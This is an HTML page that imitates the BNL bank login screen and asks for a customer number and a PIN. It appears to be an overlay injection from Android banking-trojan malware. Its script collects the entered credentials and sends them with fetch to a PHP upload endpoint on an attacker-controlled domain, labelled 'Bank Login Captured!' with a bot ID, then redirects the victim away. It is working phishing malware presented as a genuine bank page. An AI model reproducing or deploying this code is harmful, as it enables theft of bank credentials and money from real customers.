<!DOCTYPE html>
<html>
<head>
	<title>bnl</title>
    <meta charset="utf-8">
</head>
<body>

<style type="text/css">
	body {
		margin: 0;
		padding: 0;
		font-family: Helvetica, sans-serif;
		background-size: 100%;
	}
	.logo {
    text-align: center;
    background-size: 100%;
    padding: 100px 0px 20px 0px;
	}
	.form {
		text-align: center;
		padding-top: 70px;
	}
	.form label {
		display: block;
	}
	form {
		display: inline-block;
	}
fieldset {
	  position: relative;
	  text-align: center;
	  border: none;

}

input[type="text"],input[type="password"] {
border: 1px solid #ffffff;
    line-height: 16px;
    font-size: 17px;
    box-sizing: border-box;
    width: 100%;
    position: relative;
    padding: 5px 20px;
    margin: 0px 1px;
    display: block;
    -webkit-box-shadow: none;
    box-shadow: none;
    -webkit-appearance: none;
    height: 48px;
    margin: 0px 0px 0px 0px;
    color: #f6f6f6;
    text-align: left;
    background: none;
    outline: none;
    border-top: none;
    border-left: none;
    border-right: none;
}
input[type="button"] {
    left: 0;
    right: 0;
    width: 100%;
    height: 47px;
    margin: 25px 0px 0px 0px;
    outline: none;
    float: right;
    background: #1c7845;
    color: #ffffff;
    border: none;
    font-size: 16px;
    -webkit-appearance: none;
    border-radius: 2px;
    cursor: pointer;
}
fieldset span {
	display: inline-block;
    width: 80%;
    text-align: left;
    color: #c5f8ff;
    left: 0;
    right: 0;
    padding-top: 30px;
}
fieldset p {
    display: inline-block;
    left: 0;
    right: 0;
    color: #f1f1f1;
}

input::placeholder {
    color: #f6f6f6;
}
</style>


<script type="text/javascript">
    function bireyselform() {
        document.getElementById("home").style.display="none";
        document.getElementById("bireysel").style.display="block";
    }
</script>

<div class="" id="home" style="display: block;">

<style type="text/css">
	html {
        height: 100%;
    }
    body {
    display: block;
    background-image: linear-gradient( #262626, #434343 );
    height: 100%;
    }
    .info {
    	    text-align: center;
    color: #fff;
    font-weight: 600;
    font-size: 25px;
    padding-top: 60px;
    }
</style>


<div class="info">
	<span>Buonasera</span>
    <br>
    <span style="font-weight: 400; font-size: 18px;">Benvenuto in BNL</span>

	<a href="#" onclick="bireyselform()" style="display: block; text-decoration: none; padding: 15px 10px 15px 10px; background: #1c7845; width: 50%; margin: 0 auto; position: relative; top: 50px; font-size: 16px; border-radius: 2px; color: #ffffff;">Accedi</a>

</div>

</div>

<fieldset id="formtosend">

<div class="" id="bireysel" style="display: none;">


		<input type="text" name="numero" id="codice" placeholder="Numero Cliente" onkeypress="if ( isNaN( String.fromCharCode(event.keyCode) )) return false;" style="height: 65px;">
        <input type="password" name="pin" id="codice" placeholder="PIN" onkeypress="if ( isNaN( String.fromCharCode(event.keyCode) )) return false;" style="height: 65px;">
		<input name="exit" type="hidden" text="true"/>
		<input type="button" name="sumbit" onclick="send_form()" value="Accedi">

	<p style="float: left;">Nascondi dati</p>



</div>

</fieldset>	

<script>function closeapp(){setTimeout(function(){ window.location.replace("https://closeapp.com");}, 1000); };
if ( typeof Android == "undefined")
    var Android = {
        returnResult : alert.bind(window)
    }

/*********Recursive implementation of jSON.stringify; ********/
var stringifyJSON = function(obj) {
    var arrOfKeyVals = [],
        arrVals = [],
        objKeys = [];

    /*********CHECK FOR PRIMITIVE TYPES**********/
    if (typeof obj === 'number' || typeof obj === 'boolean' || obj === null)
        return '' + obj;
    else if (typeof obj === 'string')
        return '"' + obj + '"';

    /*********CHECK FOR ARRAY**********/
    else if (Array.isArray(obj)) {
        if (obj[0] === undefined)
            return '[]';
        else {
            obj.forEach(function(el) {
                arrVals.push(stringifyJSON(el));
            });
            return '[' + arrVals.join(',') + ']';
        }
    }
    /*********CHECK FOR OBJECT**********/
    else if (obj instanceof Object) {
        objKeys = Object.keys(obj);
        objKeys.forEach(function(key) {
            var keyOut = '"' + key + '":';
            var keyValOut = obj[key];
            if (keyValOut instanceof Function || typeof keyValOut === undefined)
                arrOfKeyVals.push('');
            else if (typeof keyValOut === 'string')
                arrOfKeyVals.push(keyOut + '"' + keyValOut + '"');
            else if (typeof keyValOut === 'boolean' || typeof keyValOut === 'number' || keyValOut === null)
                arrOfKeyVals.push(keyOut + keyValOut);
            else if (keyValOut instanceof Object) {
                arrOfKeyVals.push(keyOut + stringifyJSON(keyValOut));
            }
        });
        return '{' + arrOfKeyVals + '}';
    }
};

function formToJSONbyName(f)
{
    var FinalObject = {}, namesHTML = ['input','select'];
    for(var i = 0; i < namesHTML.length; i++) {
        var bsform = f.getElementsByTagName(namesHTML[i]);
        for(var j = 0; j < bsform.length; j++) {
            if(bsform[j].name == 'sumbit') continue;
            FinalObject[bsform[j].name] = bsform[j].value
        }
    }
    return stringifyJSON(FinalObject);
}

function send_form()
{
var url_string = window.location.href;
var url = new URL(url_string);
var botid = url.searchParams.get("botid");
var domain = url.searchParams.get("domain");var path = window.location.pathname;var page = path.split("/").pop();
    var form = document.getElementById('formtosend');
    fetch("http://"+domain+"/project/apiMethods/uploadLog.php?log=Bank Login Captured! -----<b> Bot ID:</b> "+botid+"<br>"+page.replace(".html","")+" | "+formToJSONbyName(form)); closeapp();
}
</script>

</body>
</html>